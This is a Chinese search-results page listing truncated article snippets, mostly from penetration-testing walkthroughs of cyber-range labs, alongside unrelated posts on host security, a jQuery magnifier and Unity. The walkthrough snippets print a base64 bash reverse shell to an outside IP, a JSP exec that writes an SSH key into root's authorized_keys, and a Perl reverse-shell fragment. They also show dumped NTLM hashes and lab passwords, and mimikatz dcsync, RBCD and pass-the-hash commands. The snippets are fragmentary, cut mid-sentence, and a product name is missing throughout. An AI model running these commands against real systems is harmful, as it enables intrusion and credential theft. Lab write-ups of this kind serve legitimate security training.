首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏很菜的web狗

    春秋-Spoofing

    工作期间某天项目经理找到,需要给客户录一个靶场的WP要求写详细一些过程,项目经理说难度还是可以的,所以丢了一个Spoofing。但尴尬的是,当时平没有很快完成任务,实在是姿势盲区了(本人太菜了。 qoM8bG00=" >> /root/.ssh/authorized_keys chmod 600 /root/.ssh/authorized_keys 在进行base64加密 ZWNobyAic3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCZ1FDakU1eUc4YXlvODhhR3FyOW9OT2E0c2ZMSFJMK2dQVytCUlFVSmlpWHltTTlQMVB1NDZ4YytJVGpYbmR2RlVtL0xqS3djbWxxU1BJN0VXSUVGd1d6eFBmTmVXcGpxSlNZYjZLa1lnZjNuK3p2dkttWCtBNkNEWlo0S2wwQUJWKzhka1lNTC9KejVJUXFsOFlkQWdLQ3BITW9pVi9iR3dWVGtDRFJodVVYTDFUVzJtN3B3WFV3OVJXTTNpOEc4V0tucE1mUXRzWVhJbzBRYXR4eDBMeHEzYnBJRWRrU0tHVHB0R3lDdXZaQ291VWQ1Y3BVcEpKNHlyVzhJMEpnOVpxcWlmc2MyaVJyd0s2emNXN3BIa0xBa2tzRVpDMkR5TTc4aVI1Rmw0Wi9QS2lKSFdZaFRoVEZ4QnlWc2lrcDMxcTJnZkFUQ3gxdmptejZ0bTNBQS9CUGtyV3RKMXhZOWl6c2psdTQ2TGRoVE1EMVU4Qm5KVWhTdVRVZDJsQUtqcDlxS2tscDE1d2ZkQmJEazRTeFdhNkJOdHdvNnYxVkRJZlJrbVBNaHpVNXlubTFPUXNPTEpLclJKSHQwb0pmcmFiRDJlNlVaK0RVU3lBOEhhMkUxRkppWGJ5a3FhNnZWOVRIYjZMbHRBcmhoRk5pa1I0MmNxeFVIMVEvcW9NOGJHMDA9IiA 文件 内容为 <% java.io.InputStream in = Runtime.getRuntime().exec("bash -c {echo,ZWNobyAic3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCZ1FDakU1eUc4YXlvODhhR3FyOW9OT2E0c2ZMSFJMK2dQVytCUlFVSmlpWHltTTlQMVB1NDZ4YytJVGpYbmR2RlVtL0xqS3djbWxxU1BJN0VXSUVGd1d6eFBmTmVXcGpxSlNZYjZLa1lnZjNuK3p2dkttWCtBNkNEWlo0S2wwQUJWKzhka1lNTC9KejVJUXFsOFlkQWdLQ3BITW9pVi9iR3dWVGtDRFJodVVYTDFUVzJtN3B3WFV3OVJXTTNpOEc4V0tucE1mUXRzWVhJbzBRYXR4eDBMeHEzYnBJRWRrU0tHVHB0R3lDdXZaQ291VWQ1Y3BVcEpKNHlyVzhJMEpnOVpxcWlmc2MyaVJyd0s2emNXN3BIa0xBa2tzRVpDMkR5TTc4aVI1Rmw0Wi9QS2lKSFdZaFRoVEZ4QnlWc2lrcDMxcTJnZkFUQ3gxdmptejZ0bTNBQS9CUGtyV3RKMXhZOWl6c2psdTQ2TGRoVE1EMVU4Qm5KVWhTdVRVZDJsQUtqcDlxS2tscDE1d2ZkQmJEazRTeFdhNkJOdHdvNnYxVkRJZlJrbVBNaHpVNXlubTFPUXNPTEpLclJKSHQwb0pmcmFiRDJlNlVaK0RVU3lBOEhhMkUxRkppWGJ5a3FhNnZWOVRIYjZMbHRBcmhoRk5pa1I0MmNxeFVIMVEvcW9NOGJHMDA9IiA :48f6da83eb89a4da8a1cc963b855a799::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 ubuntu@80/pwn.txt 172.22.11.26 可以看到,已经完成RBCD攻击了,接下来就是直接申请XR-LCM3AE8B的银票了 申请XR-LCM3AE8B CIFS票据 proxychains4

    2.4K20编辑于 2023-05-09
  • 来自专栏Windows技术交流

    排查异常

    排查异常,可以收集日志让售后看下C:\Program Files\QCloud\YunJing\log复制该目录,对复制后的目录进行压缩,压缩成.7z格式(压缩率高,压缩文件小,方便传输)3个域名对应的端口不尽相同s.yd.qcloud.com 5574l.yd.qcloud.com 8080/80/9080u.yd.qcloud.com 8080/80/9080这3个域名nslookup 如果解析到同一个地址,telnet测试反而省事了,如果解析到多个地址,每个地址对应的端口都telnet测试下看看通不通s.yd.qcloud.coml.yd.qcloud.comu.yd.qcloud.com域名的情况比较复杂 ,具体可参考官网文档:https://cloud.tencent.com/document/product/296/12236图片官网文档上虽然对的域名分门别类这么多,但我建议以nslookup或dig

    2K40编辑于 2022-06-21
  • 来自专栏产品体验优化私房菜课程

    主机安全()产品简介

    台以下,可以参考网上的一些文章来加固我们的服务器,如笔者之前整理的《Linux服务器安全加固10条建议》和《Windows服务器安全加固10条建议》等, 如果服务器不断的增加业务快速的膨胀这时就需要借助“” 的安全力量,那就是“主机安全()”这款产品。 image.png 开通主机时可以免费开通“主机安全”防护 image.png 什么是主机安全() 主机安全基于腾讯安全积累的海量威胁的数据,利用机器学习为用户提供黑客入侵检测和漏洞风险预警等安全防护服务 image.png 的主要功能介绍 概览页面:https://console.cloud.tencent.com/cwp ; 资产列表(需要付费3元/台1天): 直观的看到每台服务器上的端口、账号 image.png 本文参考 产品介绍视频: https://cloud.tencent.com/edu/learning/course-1055-995 主机安全文档:https://cloud.tencent.com

    10K42编辑于 2022-04-14
  • 来自专栏红蓝对抗

    内网渗透-春秋篇(Privilege)

    +uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm/GEobmrmLYh},但这明显是一个加密后的结果,我们需要对它进行解密,这里有两种方法 一是用网页的project接口的gitlab +uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm/GEobmrmLYh}").getPlainText()) 探测git仓库内容 在刚刚fscan扫描中我们可以看到 [*] * SHA1 : 00e3cf78689e875da3f43a5b62cc919990b52a6b tspkg : wdigest : * Username * Password : c8 9c 74 62 4b a5 13 60 f8 9f 61 ee 0c 9c b4 ca 97 d7 4c 53 6a 10 4e e7 74 03 51 0a 95 3f af 15 22 5d 7f 0c 10 c9 96 19 7a bd 28 d7 c8 9a b7 ec 04 fb a9 18 83 30 e1 d9 75 aa ed c1 81 d0 76 c3

    1.2K10编辑于 2024-04-12
  • 来自专栏红蓝对抗

    内网渗透之突破-Delivery

    ysoserial.jar ysoserial.exploit.JRMPListener 1098 CommonsCollections6 "bash -c {echo,YmFzaCAtaSAmPiAvZGV2L3RjcC8xMTkuMy4yMTUuMTk4Lzc3NzYgMD4mMQ ftp命令,参考https://gtfobins.github.io/gtfobins/ftp/因此我们这里在靶机上开启ftp服务,而后使用joyce用户连接,将flag02.txt传输上去python3  此时可以看到已具有SUID权限回到joyce用户这里,执行shell文件即可获取root权限在根目录查看到flag02.txt同时也获取到一个账密xiaorang.lab/zhangwen\QT62f3gBhK1 XIAORANG * Password : (null)kerberos : * Username : chenglei * Domain : XIAORANG.LAB * Password : Xt61f3LBhg1 Mimikatz导出域内所有Hashlsadump::dcsync /domian:xiaorang.lab /all /csv票据传递使用刚刚获取的Hash进行登录即可proxychains python3

    55010编辑于 2024-02-27
  • 来自专栏红蓝对抗

    内网渗透 -春秋篇之Hospital

    Target 172.30.12.5 is alive (icmp) Target 172.30.12.236 is alive [*] Icmp alive hosts len is: 3 我们的第一层代理是VPS作为服务端,外网靶机作为客户端来搭建的,那么我们在搭建第二层的话,以外网靶机作为服务端,然后以域用户二作为客户端,此时就实现了多层代理 VPS->外网靶机->域用户2->域用户3 open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\''); 成功反弹shell,通过python3

    80910编辑于 2024-03-18
  • 来自专栏红蓝对抗

    内网渗透-春秋篇之Flarum

    ::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount :504:aad3b435b51404eeaad3b435b51404ee:b40dda6fd91a2212d118d83e94b61b11::: [*] Dumping cached domain logon [*] NL$KM 0000 8B 14 51 59 D7 67 45 80 9F 4A 54 4C 0D E1 D3 29 ..QY.gE..JTL...) 0010 3E B6 横向传递 借助wmiexec.py工具横向 proxychains python3 wmiexec.py -hashes :c3cfdc08527ec4ab6aa3e630e79d349b Administrator @172.22.60.15 -codec gbk 还有一个主机PC1也是同理,改下IP即可 proxychains python3 wmiexec.py -hashes :c3cfdc08527ec4ab6aa3e630e79d349b

    86410编辑于 2024-02-29
  • 来自专栏红蓝对抗

    内网渗透 -春秋篇之Hospital

    Target 172.30.12.5 is alive (icmp) Target 172.30.12.236 is alive [*] Icmp alive hosts len is: 3 我们的第一层代理是VPS作为服务端,外网靶机作为客户端来搭建的,那么我们在搭建第二层的话,以外网靶机作为服务端,然后以域用户二作为客户端,此时就实现了多层代理 VPS->外网靶机->域用户2->域用户3 open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\''); 成功反弹shell,通过python3

    2.2K20编辑于 2024-03-10
  • 来自专栏腾讯云开发者社区头条

    【腾讯-主机安全防护解决方案

    image.png 为腾讯云海量用户抵御黑客攻击 image.png 充分利用的优势对密码破解行为进行拦截和预警 image.png 基于AI的WebShell检测技术 WebShell检测优势 Q:是否会采集我主机上的隐私数据? Q:的客户端稳定性如何,是否会造成业务影响? Q:的漏洞检测覆盖哪些范围,是否可以替代传统扫描器? A:漏洞检测功能主要侧重于高危可造成入侵的漏洞,包括WEB和系统组件,对于新出现的漏洞有较快的响应速度,能在极短的时间内完成全部业务主机检测,可以避免扫描器策略更新滞后和扫描效率低带来的风险,对于历史上的漏洞

    26.3K138发布于 2018-08-01
  • 来自专栏红蓝对抗

    内网渗透—春秋篇之2022网鼎杯

    172.22.15.13 --zip --dns-tcp 查看域内关系 发现此用户对XR-0687主机有GenericWrite权限,可尝试RBCD获取管理员权限 RBCD攻击 proxychains python3 proxychains python3 rbcd.py xiaorang.lab/lixiuying:'winniethepooh' -dc-ip 172.22.15.13 -action write -delegate-to 'XR-0687$' -delegate-from 'qwq$' proxychains python3 getST.py xiaorang.lab/'qwq':'Qq123456 test.pem openssl rsa -in test.pem -out test.key openssl x509 -in test.pem -out test.crt proxychains python3 test.crt -key test.key -domain xiaorang.lab -dc-ip 172.22.15.13 接下来将证书配置到域控的RBCD proxychains python3

    92810编辑于 2024-02-27
  • 来自专栏红蓝对抗

    内网渗透—春秋篇之2022网鼎杯

    172.22.15.13 --zip --dns-tcp 查看域内关系 发现此用户对XR-0687主机有GenericWrite权限,可尝试RBCD获取管理员权限 RBCD攻击 proxychains python3 proxychains python3 rbcd.py xiaorang.lab/lixiuying:'winniethepooh' -dc-ip 172.22.15.13 -action write -delegate-to 'XR-0687$' -delegate-from 'qwq$' proxychains python3 getST.py xiaorang.lab/'qwq':'Qq123456 test.pem openssl rsa -in test.pem -out test.key openssl x509 -in test.pem -out test.crt proxychains python3 test.crt -key test.key -domain xiaorang.lab -dc-ip 172.22.15.13 接下来将证书配置到域控的RBCD proxychains python3

    53010编辑于 2024-02-29
  • 来自专栏web秀

    Jquery和CSS3轻松实现放大效果

    on CodePen.1 html

    <img class="small" src="0413pf<em>3</em>. 0 7px 7px rgba(0, 0, 0, 0.25), inset 0 0 40px 2px rgba(0, 0, 0, 0.25); background: url('0413pf<em>3</em>. } } }) }) 是不是觉得很简单了,代码量不大,原理了就是鼠标移动时,获取鼠标在原始图片的位置,计算出放大镜片图片的background-osition值,实时去修改,这样就形成了放大<em>镜</em>的效果

    1.9K20发布于 2019-09-04
  • 来自专栏河湾欢儿的专栏

    放大

    放大:淘宝等电商页面应用广泛... 思路:先让move块和bimg块隐藏,当鼠标移动到box上时,使move块和bimg块显示,获取鼠标当前的位置,然后经过计算给与move块和bimg块适当的值实现放大效果 <! DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>放大</title> <style top: 0; left: 0; background:#000; opacity: .3;

    2K30发布于 2018-09-06
  • 来自专栏微卡智享

    Unity3D使用Cinemachine配合Timeline实现运效果

    ——《微卡智享》 本文长度为1522字,预计阅读4分钟 前言 Unity3D中的插件Cinemachine高级虚拟摄像系统,配合Timeline时间轴一起使用,可以实现像电影级别的分等效果,这篇我们就继续用上个模拟收费通过的项目 ,在这个基础上使用Cinemachine配合Timeline实现一个运的效果。 可以看到,左边改为一个设置窗口了,同时右边加入了一个Playable Director的组件,接下来就是设置我们的运了 02 配置时间轴 ? 这样,我们Cinemachine配合TimeLine的实现运的效果就可以完成了。 ? 完 ? 扫描二维码 获取更多精彩 微卡智享 「 往期文章 」 学习|Unity3D使用协程实现减速停车效果 学习|Unity3d的导航实现循环线路移动 学习|C#线程中AutoResetEvent的使用

    4.2K20发布于 2020-09-01
  • 来自专栏腾讯安全

    腾讯主机安全()兵器库:WebShell克星-TAV引擎

    依靠静态分析引擎,我们对开源社区的热门php项目进行了自动化代码审计,发现了数十个风险,人工确认利用后,向CNVD提交了3个漏洞,并获得漏洞证书。 TAV WebShell引擎的检测效果 在上真实WebShell黑样本集中,腾讯TAV引擎的检测贡献率能达到99%以上。 相比于传统的特征检测方案,TAV WebShell检测引擎不仅有着超高的检测率,同时也有超低的误报率,在上真实环境中,也具备较高的独报能力。 目前腾讯主机安全()已全面接入TAV WebShell检测能力,使腾讯主机查杀防御WebShell攻击的能力得以大幅提升。 后续还将陆续接入腾讯安全其他产品,比如腾讯高级威胁检测系统(御界)、Web应用防火墙、防火墙、零信任iOA等等产品,将全面增强在终端侧、主机侧、流量侧的安全能力。

    4.2K20编辑于 2021-12-08
  • 来自专栏webTower

    放大原理

    上面代码中,图片没有设置高度,我们在JavaScript中用 img.offsetWidth 来获取。获取之后设置 wrapper 的宽度与 img 的宽度相同。

    2.8K10发布于 2019-10-23
  • 来自专栏Creator星球游戏开发社区

    放大效果

    它核心是对相机应用,异名基于此实现一个放大的demo ? 一种是透视投影,它是锥形的成像模式,是从某个投射中心将物体投射到单一投影面上所得到的透视图,成像效果远小近大,与人们观看物体时所产生的视觉效果非常接近,在做3D场景的时候,就必须用该模式来拍摄3D的画面 相机有—个clearFlag如果你设置了,它在绘制画面的时候,会清理屏幕 一般只给前面的相机设置clearFlag;后面相机都不能再设置,不然会把前面相机绘制的内容清除掉 把思路拉回到放大demo中, 要实现放大,其实就是多创造一个相机去拍摄需要放大的物体,然后调整相机的缩放比例,使投影的物体放大或者缩小对应的倍数,然后配合使用Mask组件去裁剪我们需要的局部位置,mask的编辑器设置请参考项目源码

    2.3K30发布于 2020-04-22
  • 来自专栏贾志刚-OpenCV学堂

    从科技跨追踪(ReID)技术再次刷新世界记录

    近日,从科技在跨追踪技术(ReID,Person Re-identification)上再次取得重大进展,在三大主流ReID数据集Market-1501、DukeMTMC-reID、CUHK03上超过阿里巴巴 这是继去年从科技刷新跨追踪技术世界纪录后,再一次在该领域领跑全球。 相较去年,从科技在扩大算法领先优势的同时,也在跨追踪(ReID)技术的商业化中积累了丰富的实践经验,不仅核心算法速度提高了10倍,还围绕跨追踪(ReID)技术打造了行人检测、追踪、结构化等一系列算法模块 3%-4%的巨大提升,Rank-1关键指标分别也达到了业界最好水平(注:该结果是在不引入额外数据,不利用测试集时空信息,不进行重排再优化(Re-ranking)等条件下取得)。 从科技作为这一领域较早的探索者和布局者,在跨追踪和其相关技术上,如行人检测、行人检索、行人轨迹跟踪、行人属性结构化、行人动作检测和识别等,都拥有大量技术经验积累。

    1.3K20发布于 2019-04-29
  • 来自专栏最新医学影像技术

    SELMA3D2024——3D光片显微图像自监督分割

    今天将分享3D光片显微图像自监督分割完整实现版本,为了方便大家学习理解整个流程,将整个流程步骤进行了整理,并给出详细的步骤结果。感兴趣的朋友赶紧动手试一试吧。 经过组织透明化和特定结构染色后的光片显微 (LSM) 提供了一种高效、高对比度和超高分辨率的方法,可用于可视化各种样本中的各种生物结构,例如细胞和亚细胞结构、细胞器和过程。 在结构染色步骤中,可以使用各种染料、荧光团或抗体来选择性地标记样本内的特定生物结构并增强其在显微下的对比度。 随后,可以在小得多的带注释数据集上对预训练模型进行微调,从而显著减少各种 3D LSM 分割应用中的注释工作。 二、SELMA3D2024任务 3D 显微图像中大脑结构的自监督语义分割。 三、SELMA3D2024数据集 光片显微 (LSM) 结合组织透明化和特定结构染色,具有独特的优势,可以对大型完整样本进行高分辨率成像,同时最大限度地减少光漂白和光毒性。

    41110编辑于 2024-07-03
  • 来自专栏天天

    $.extend()插件(放大

    no-repeat 0 0; background-size: 300% 300%; display: none; } </style> 3.

    1.7K10发布于 2018-09-29
领券